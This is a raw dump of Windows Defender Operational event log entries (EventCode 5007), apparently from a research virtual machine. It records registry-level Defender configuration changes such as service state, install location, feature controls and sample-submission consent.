TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: Default\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender 11/14/2023 08:59:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=442 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\InstallLocation = C:\Program Files\Windows Defender\ New value: HKLM\SOFTWARE\Microsoft\Windows Defender\InstallLocation = C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\ 11/14/2023 08:59:13 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=441 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\ServiceStartStates = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1 11/14/2023 08:59:11 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=440 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: Default\IsServiceRunning = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1 11/14/2023 08:59:03 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=438 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\IsServiceRunning = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1 11/14/2023 08:59:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=437 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender 11/14/2023 08:58:48 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=431 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Miscellaneous Configuration\BddUpdateFailure = 0x0 11/14/2023 08:58:48 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=430 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Miscellaneous Configuration\DeltaUpdateFailure = 0x0 11/14/2023 08:58:47 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=429 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\15 = 0x1 11/14/2023 08:58:47 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=428 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\13 = 0x1 11/14/2023 08:58:47 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=427 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\9 = 0x1 11/14/2023 08:58:47 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=426 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\7 = 0x1 11/14/2023 08:58:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=422 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\MpEngine\MpEngineRing = 0x2 New value: 11/14/2023 08:58:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=421 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\MpEngine\MpCampRing = 0x2 New value: 11/14/2023 07:06:31 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=259 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet\SubmitSamplesConsent = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet\SubmitSamplesConsent = 0x0